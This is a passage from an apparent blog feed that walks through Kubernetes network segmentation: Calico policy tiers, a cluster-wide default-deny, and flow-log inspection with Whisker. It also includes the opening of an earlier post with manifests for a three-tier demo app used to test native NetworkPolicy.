<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">09</span><span class="hljs-string">-allow-backend-to-db-egress</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">9</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"api"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Egress</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"db"</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">5432</span>]
</code></pre>
<p>With these in place, your global deny still sets the baseline for the cluster, but these app‑specific allows at <code>order: 9</code> carve out the necessary paths cleanly.</p>
<h2 id="heading-app-flows-under-global-deny-option-c-tiers">App Flows Under Global Deny — Option C (Tiers)</h2>
<p>So far, we’ve looked at two ways to carve out app flows under a cluster-wide default-deny. But there’s a third way that is more Calico: <strong>tiers</strong>.</p>
<h3 id="heading-what-are-tiers">What are tiers?</h3>
<p>Calico evaluates policies by <strong>tier</strong>, then by <strong>order</strong>.</p>
<ul>
<li><p><strong>Tier</strong> = high-level category (e.g., <code>baseline</code>, <code>app</code>, <code>security</code>).</p>
</li>
<li><p><strong>Order</strong> = numeric priority <em>within</em> a tier (lower runs first).</p>
</li>
</ul>
<p>This lets you separate “cluster guardrails” from “app-specific rules” so they don’t trip over each other. Think of tiers like folders: guardrail policies go in one, app rules in another. The engine then processes them in order, tier by tier.</p>
<h3 id="heading-creating-tiers">Creating tiers</h3>
<p>Define tiers once:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Tier</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">app</span>
<span class="hljs-attr">spec:</span> { <span class="hljs-attr">order:</span> <span class="hljs-number">20</span> }
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Tier</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">baseline</span>
<span class="hljs-attr">spec:</span> { <span class="hljs-attr">order:</span> <span class="hljs-number">100</span> }
</code></pre>
<ul>
<li><p><code>app</code> tier (order 20): higher priority, runs before baseline.</p>
</li>
<li><p><code>baseline</code> tier (order 100): lower priority, catches everything else.</p>
</li>
</ul>
<h3 id="heading-app-flows-in-the-app-tier">App flows in the <code>app</code> tier</h3>
<p>Here, we recreate frontend→backend and backend→db flows, but put them in the <code>app</code> tier:</p>
<pre><code class="lang-yaml"><span class="hljs-comment"># Frontend → Backend</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">app-frontend-to-backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">app</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">projectcalico.org/namespace</span> <span class="hljs-string">==</span> <span class="hljs-string">"frontend"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Egress</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"api"</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">80</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">app-backend-ingress</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">app</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"api"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>]
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">source:</span>
        <span class="hljs-attr">namespaceSelector:</span> <span class="hljs-string">projectcalico.org/name</span> <span class="hljs-string">==</span> <span class="hljs-string">"frontend"</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">80</span>]
<span class="hljs-meta">---</span>
<span class="hljs-comment"># Backend → DB</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">app-backend-to-db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">app</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">projectcalico.org/namespace</span> <span class="hljs-string">==</span> <span class="hljs-string">"backend"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Egress</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"db"</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">5432</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">app-db-ingress</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">app</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"db"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>]
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">source:</span>
        <span class="hljs-attr">namespaceSelector:</span> <span class="hljs-string">projectcalico.org/name</span> <span class="hljs-string">==</span> <span class="hljs-string">"backend"</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">5432</span>]
</code></pre>
<h3 id="heading-guardrails-in-the-baseline-tier">Guardrails in the <code>baseline</code> tier</h3>
<p>Default-deny stays at the baseline tier:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">baseline-default-deny</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">baseline</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">all()</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>, <span class="hljs-string">Egress</span>]
  <span class="hljs-attr">ingress:</span> []
  <span class="hljs-attr">egress:</span> []
</code></pre>
<p>I didn't document the creation and validation of this last option as we are just getting more of the same. But it should be clear how they help.</p>
<ul>
<li><p><strong>Clear separation</strong>: app rules live in <code>app</code>, guardrails in <code>baseline</code>.</p>
</li>
<li><p><strong>Predictability</strong>: app policies are evaluated first; anything not allowed there hits the baseline deny.</p>
</li>
<li><p><strong>Scale</strong>: you can add more tiers later (e.g., <code>security</code> for IDS/IPS-style rules) without mixing concerns.</p>
</li>
</ul>
<p>In other words, tiers give you a clean “policy hierarchy” instead of one giant pile of YAML. They are definitely the best out of our three options.</p>
<hr />
<h2 id="heading-seeing-flows-with-calico-logs">Seeing Flows with Calico Logs</h2>
<p>At this point we’ve put relevant guardrails in place:</p>
<ul>
<li><p>Cluster-wide deny + DNS allow (GlobalNetworkPolicy).</p>
</li>
<li><p>App-specific flows (frontend ↔ backend ↔ db) just like Part 1.</p>
</li>
</ul>
<p>But how do you know what’s really happening? Did the policy work? What got blocked, and what slipped through?</p>
<p>This is where Calico’s <a target="_blank" href="https://docs.tigera.io/calico/latest/observability/view-flow-logs">flow logs</a> come in — and yeah, I admit it, I love logs. They give you clear L3/L4 traffic visibility along with the exact Calico policies that allowed or denied each connection. It’s a newer feature, but one of the most valuable additions to Calico’s policy toolkit.</p>
<h3 id="heading-enabling-flow-logs">Enabling Flow Logs</h3>
<p>If you're not using the latest and greatest Calico, ensure you <a target="_blank" href="https://docs.tigera.io/calico/latest/operations/upgrading/kubernetes-upgrade#upgrading-an-installation-that-uses-the-operator">upgrade</a>. Just download two definition files and update. Took me a while to figure out I needed some new CRDs that are only on the newest version.</p>
<p>You need to enable Goldmane (I assume it came from the MTG card?) for the logging API and Whisker for the nice little UI that uses Goldmane logging:</p>
<pre><code class="lang-bash">kubectl apply -f - &lt;&lt;EOF
apiVersion: operator.tigera.io/v1
kind: Goldmane
metadata:
  name: default
---
apiVersion: operator.tigera.io/v1
kind: Whisker
metadata:
  name: default
EOF
</code></pre>
<p>To get this working in the lab you will most likely want to create a <code>NodePort</code> service for <em>Whisker</em> (your UI for flow logs) as it just uses <code>ClusterIP</code> by default. I found this a bit tricky, because my first instinct was to try to get this done by patching the existing service. However, since this follows an operator you'll need to create a new service entirely. Failing to do so will cause your service to revert. Create the following <code>Service</code> in the <code>calico-system</code> namespace via a saved file called <code>whisker-nodeport.yaml</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">whisker-nodeport</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">calico-system</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">type:</span> <span class="hljs-string">NodePort</span>
  <span class="hljs-attr">ports:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-number">8081</span>
    <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
    <span class="hljs-attr">targetPort:</span> <span class="hljs-number">8081</span>
    <span class="hljs-attr">nodePort:</span> <span class="hljs-number">30082</span> <span class="hljs-comment">#Or whatever you so desire, even nothing at all</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">k8s-app:</span> <span class="hljs-string">whisker</span>
</code></pre>
<p>Apply as usual via <code>kubectl apply -f whisker-nodeport.yaml</code>.</p>
<p>Ready to roll.</p>
<p>Well, not quite. As we're working on network policies, it is a bit ironic that I found <em>Whisker</em> creates its own network policy, so trying to access it from your local machine or anywhere outside the node that is hosting Whisker will not work. So we need to carve out an exception. I just did a full exception but you might consider narrowing the ingress allowance. Create the following <code>NetworkPolicy</code> in the <code>calico-system</code> namespace via a saved file called <code>whisker-np-allow.yaml</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">whisker-nodeport-allow</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">calico-system</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app.kubernetes.io/name:</span> <span class="hljs-string">whisker</span>
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">Ingress</span>]
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">8081</span>
</code></pre>
<p>Apply as usual via <code>kubectl apply -f whisker-np-allow.yaml</code>. And now you should be able to navigate to your service using something like http://192.168.64.7:30082!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1756857406979/f547f5be-ca3d-4795-b8a8-3840429f5869.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-checking-the-logs">Checking the Logs</h3>
<p>Now generate some traffic as we did at the start:</p>
<pre><code class="lang-bash">matt@controlplane:~/calico$ kubectl run -n frontend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Welcome to nginx!&lt;/title&gt;
&lt;style&gt;
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;Welcome to nginx!&lt;/h1&gt;
&lt;p&gt;If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.&lt;/p&gt;

&lt;p&gt;For online documentation and support please refer to
&lt;a href="http://nginx.org/"&gt;nginx.org&lt;/a&gt;.&lt;br/&gt;
Commercial support is available at
&lt;a href="http://nginx.com/"&gt;nginx.com&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Thank you for using nginx.&lt;/em&gt;&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;</span>
</code></pre>
<p>Now you should see some logs. Filter for Destination Namespace of <code>backend</code> and you should see something similar.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1756871127790/751963b4-4a61-4aee-8ed8-424a794c9269.png" alt class="image--center mx-auto" /></p>
<p>Cool, we can see that worked. Now let’s try something that doesn’t work. We’ll go ahead and do the same netshoot test, but this time make a call to the backend service from the default namespace.</p>
<pre><code class="lang-bash">matt@controlplane:~/np$ kubectl run <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80</span>
</code></pre>
<p>This will fail based on our network policies. So let’s see what Whisker shows.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1756938645158/e20f7ad6-d563-49c3-aee4-165b8195944e.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-reading-the-flow-log-verdict">Reading the Flow Log Verdict</h3>
<p>Here’s the example trace from Whisker when our traffic got denied:</p>
<pre><code class="lang-json">{
  <span class="hljs-attr">"enforced"</span>: [
    {
      <span class="hljs-attr">"kind"</span>: <span class="hljs-string">"EndOfTier"</span>,
      <span class="hljs-attr">"name"</span>: <span class="hljs-string">""</span>,
      <span class="hljs-attr">"namespace"</span>: <span class="hljs-string">""</span>,
      <span class="hljs-attr">"tier"</span>: <span class="hljs-string">"default"</span>,
      <span class="hljs-attr">"action"</span>: <span class="hljs-string">"Deny"</span>,
      <span class="hljs-attr">"policy_index"</span>: <span class="hljs-number">0</span>,
      <span class="hljs-attr">"rule_index"</span>: <span class="hljs-number">-1</span>,
      <span class="hljs-attr">"trigger"</span>: {
        <span class="hljs-attr">"kind"</span>: <span class="hljs-string">"GlobalNetworkPolicy"</span>,
        <span class="hljs-attr">"name"</span>: <span class="hljs-string">"default-deny"</span>,
        <span class="hljs-attr">"namespace"</span>: <span class="hljs-string">""</span>,
        <span class="hljs-attr">"tier"</span>: <span class="hljs-string">"default"</span>,
        <span class="hljs-attr">"action"</span>: <span class="hljs-string">"ActionUnspecified"</span>,
        <span class="hljs-attr">"policy_index"</span>: <span class="hljs-number">0</span>,
        <span class="hljs-attr">"rule_index"</span>: <span class="hljs-number">0</span>,
        <span class="hljs-attr">"trigger"</span>: <span class="hljs-literal">null</span>
      }
    }
  ],
  <span class="hljs-attr">"pending"</span>: [
    {
      <span class="hljs-attr">"kind"</span>: <span class="hljs-string">"EndOfTier"</span>,
      <span class="hljs-attr">"name"</span>: <span class="hljs-string">""</span>,
      <span class="hljs-attr">"namespace"</span>: <span class="hljs-string">""</span>,
      <span class="hljs-attr">"tier"</span>: <span class="hljs-string">"default"</span>,
      <span class="hljs-attr">"action"</span>: <span class="hljs-string">"Deny"</span>,
      <span class="hljs-attr">"policy_index"</span>: <span class="hljs-number">0</span>,
      <span class="hljs-attr">"rule_index"</span>: <span class="hljs-number">-1</span>,
      <span class="hljs-attr">"trigger"</span>: {
        <span class="hljs-attr">"kind"</span>: <span class="hljs-string">"GlobalNetworkPolicy"</span>,
        <span class="hljs-attr">"name"</span>: <span class="hljs-string">"01-dns-clients-egress"</span>,
        <span class="hljs-attr">"namespace"</span>: <span class="hljs-string">""</span>,
        <span class="hljs-attr">"tier"</span>: <span class="hljs-string">"default"</span>,
        <span class="hljs-attr">"action"</span>: <span class="hljs-string">"ActionUnspecified"</span>,
        <span class="hljs-attr">"policy_index"</span>: <span class="hljs-number">0</span>,
        <span class="hljs-attr">"rule_index"</span>: <span class="hljs-number">0</span>,
        <span class="hljs-attr">"trigger"</span>: <span class="hljs-literal">null</span>
      }
    }
  ]
}
</code></pre>
<p>What this is telling us:</p>
<ul>
<li><p><strong>Enforced:</strong> the cluster-wide <code>GlobalNetworkPolicy/default-deny</code> in the <code>default</code> tier denied the connection. No preceding allow matched, so the blanket deny won.</p>
</li>
<li><p><strong>Pending:</strong> <code>GlobalNetworkPolicy/01-dns-clients-egress</code> was evaluated but didn’t apply (this traffic wasn’t DNS, so that allow rule wasn’t relevant).</p>
</li>
<li><p><strong>Bottom line:</strong> the request was denied by the global default-deny; no app allow matched first, and unrelated DNS allow rules won’t help an HTTP call.</p>
</li>
</ul>
<blockquote>
<p>If you run the curl <strong>from the</strong> <code>frontend</code> namespace, you’ll typically see your app allow (e.g., frontend→backend) in <strong>pending</strong> when selectors don’t match — which is a clearer illustration of “the allow didn’t match, so default-deny fired.” Right now, the pending entry is your DNS policy because the request wasn’t DNS.</p>
</blockquote>
<hr />
<h2 id="heading-beyond-the-lab">Beyond the Lab</h2>
<p>The lab shows how Calico fills in the gaps left by raw <code>NetworkPolicy</code>. If you’re already running Calico as your CNI, you may have a lot of these features sitting idle without realizing it. Calico isn't just there to hand out pod IPs and push packets around. That’s fine, but it means you’re leaving value on the table:</p>
<ul>
<li><strong>Global guardrails:</strong> set default-deny and DNS once, not in every namespace. It’s already in the box.</li>
</ul>
<ul>
<li><p><strong>Tiered policies:</strong> you can define guardrails at the top, app-specific rules later, and catch everything else at the end.</p>
</li>
<li><p><strong>Flow logs:</strong> new in Calico, and genuinely useful for visibility.</p>
</li>
</ul>
<p>Driving Calico only as a CNI is like leaving a stick-shift supercar in first gear. And sorry, there’s no automatic mode in the CNI world. And yes, the cat theme is a bit much — Calico, Tigera, Felix, Whisker, Goldmane — but at least the features deliver.</p>
<hr />
<h2 id="heading-coming-up-next">Coming Up Next</h2>
<p>We’ve now gone deep on Kubernetes <code>NetworkPolicy</code> and Calico’s extensions. Next up: <strong>Cilium</strong>.</p>
<p>Cilium takes a different tack, promising kernel-level enforcement, API-aware observability, and a whole lot of coolness. In the final part of this series we’ll look at how Cilium stacks up.</p>
]]></content:encoded></item><item><title><![CDATA[Service Boundaries: Kubernetes NetworkPolicy Basics]]></title><description><![CDATA[By default, Kubernetes is wide open. Of course you knew that already. Any pod can talk to any other pod, in any namespace, on any port. That makes life easy for anyone putting an app into prod, and just as easy for anyone who compromises one workload...]]></description><link>https://cloudsecburrito.com/service-boundaries-kubernetes-networkpolicy-basics</link><guid isPermaLink="true">https://cloudsecburrito.com/service-boundaries-kubernetes-networkpolicy-basics</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[networkpolicy]]></category><category><![CDATA[network security]]></category><category><![CDATA[Kubernetes Security]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 27 Aug 2025 22:42:46 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1756333998722/e27f495f-f42d-4497-98ef-65c486fdb0df.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>By default, Kubernetes is wide open. Of course you knew that already. Any pod can talk to any other pod, in any namespace, on any port. That makes life easy for anyone putting an app into prod, and just as easy for anyone who compromises one workload. Once they’re in, nothing stops them from laterally probing every service in the cluster.  </p>
<p>So I went down the path of figuring out how to build meaningful guardrails. The answer is <strong>service boundaries</strong>. Sounds complicated, but it really comes down to network policies. I’d heard about them, and I’d messed with CNIs like Calico and Cilium while setting up clusters, but hadn’t gone deep on what those policies could actually enforce.  </p>
<p>That naturally led to the fact that you need policies that describe which pods <em>should</em> be talking to which other pods, and on what ports. Everything else gets dropped. The built-in tool for this is <a target="_blank" href="https://kubernetes.io/docs/concepts/services-networking/network-policies/"><code>NetworkPolicy</code></a>. With a few YAML manifests, you can flip a cluster from “anyone can connect to anything” into “deny by default, allow only what we mean.”</p>
<p>This is the start of a three-part series on service boundaries in Kubernetes:  </p>
<ul>
<li><strong>Part 1:</strong> Native <code>NetworkPolicy</code> for baseline L3/L4 segmentation.  </li>
<li><strong>Part 2:</strong> Scaling boundaries with Calico’s global defaults and external allowlists.  </li>
<li><strong>Part 3:</strong> Intent-aware controls with Cilium and Hubble for L7 enforcement.  </li>
</ul>
<p>But how does a <code>NetworkPolicy</code> really work? These guardrails operate at the <strong>network (L3) and transport (L4) layers</strong>. In practice that means you’re defining which pod groups (by label/namespace) can connect to which other pods (L3: IP/addressing), and on which ports and protocols (L4: TCP/UDP). It’s the foundation for segmentation, not yet looking inside the traffic itself, just deciding who’s allowed to talk and what ports they can use. Later in the series we’ll climb up the stack into application-aware (L7) controls, but this post is about getting the baseline right at L3/L4.</p>
<p>We’ll start here with the basics: a three-tier app (frontend → backend → database), a default-deny posture, and a small set of explicit allows to make it work. Along the way we’ll pick up lessons, gotchas, and maybe a few regrets from trial and error.</p>
<hr />
<h2 id="heading-the-test-app-deploy-baseline-verification">The Test App (Deploy + Baseline Verification)</h2>
<p>Let's dive into our simple three-tier demo. Nothing fancy — just enough to show how service boundaries play out in practice:</p>
<ul>
<li><strong>Frontend</strong> namespace: a web pod (nginx or a tiny app) labeled <code>app=web</code></li>
<li><strong>Backend</strong> namespace: an API pod labeled <code>app=api</code></li>
<li><strong>DB</strong> namespace: a PostgreSQL pod labeled <code>app=postgres</code></li>
</ul>
<p>Traffic flow:</p>
<pre><code>frontend:web  ---&gt;  backend:api  ---&gt;  db:postgres
</code></pre><p><strong>Goal boundaries:</strong>  </p>
<ul>
<li>Frontend → Backend on <strong>80/TCP</strong> only  </li>
<li>Backend → DB on <strong>5432/TCP</strong> only  </li>
<li>DNS egress allowed everywhere  </li>
<li>Everything else: blocked</li>
</ul>
<h3 id="heading-deploy-the-demo-app-single-manifest">Deploy the demo app (single manifest)</h3>
<p>This will give you everything you need: namespaces, workloads, and services. Save as <code>test-app.yaml</code> and apply with <code>kubectl apply -f test-app.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Namespace</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">frontend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">tier:</span> <span class="hljs-string">frontend</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Namespace</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">backend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">tier:</span> <span class="hljs-string">backend</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Namespace</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">db</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">tier:</span> <span class="hljs-string">db</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">nginx:1.27-alpine</span>
          <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">containerPort:</span> <span class="hljs-number">80</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">http</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">nginx:1.27-alpine</span>
          <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">containerPort:</span> <span class="hljs-number">80</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">http</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">80</span>
